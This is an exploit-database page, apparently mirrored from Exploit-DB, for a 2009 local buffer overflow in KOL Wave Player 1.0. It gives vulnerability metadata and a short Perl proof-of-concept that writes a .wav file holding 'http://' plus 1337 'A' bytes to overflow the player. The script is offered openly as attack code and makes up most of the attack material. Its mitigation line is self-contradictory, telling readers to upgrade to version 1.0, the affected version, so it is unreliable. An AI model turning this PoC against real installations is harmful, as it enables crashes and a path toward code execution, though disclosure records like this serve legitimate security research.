header-logo
Suggest Exploit
vendor:
KOL Wave Player
by:
cr4wl3r
9,3
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: KOL Wave Player
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:kol_wave_player:kol_wave_player:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

KOL Wave Player 1.0 (.wav) Local Buffer Overflow PoC

KOL Wave Player 1.0 is vulnerable to a local buffer overflow vulnerability. By creating a specially crafted .wav file with an overly long URL, an attacker can cause a buffer overflow, resulting in arbitrary code execution.

Mitigation:

Upgrade to the latest version of KOL Wave Player 1.0
Source

Exploit-DB raw data:

#!/usr/bin/perl
#########################################################
## Usage-->>file created-->>load file-->>b00m.wav >>>BOOM
#########################################################


print "#####################################################\n";
print "[!] KOL Wave Player 1.0 (.wav) Local Buffer Overflow PoC\n";
print "\n";
print "[!] Author: cr4wl3r\n";
print "[!] Mail: cr4wl3r[!]linuxmail.org\n";
print "#####################################################\n";


my $boom = "http://"."\x41" x 1337;
my $filename = "b00m.wav";
open (FILE,">$filename");
print FILE "$boom";
print "\nFile successfully created!\n";

Navigation

Suggest Exploit

Services By CQR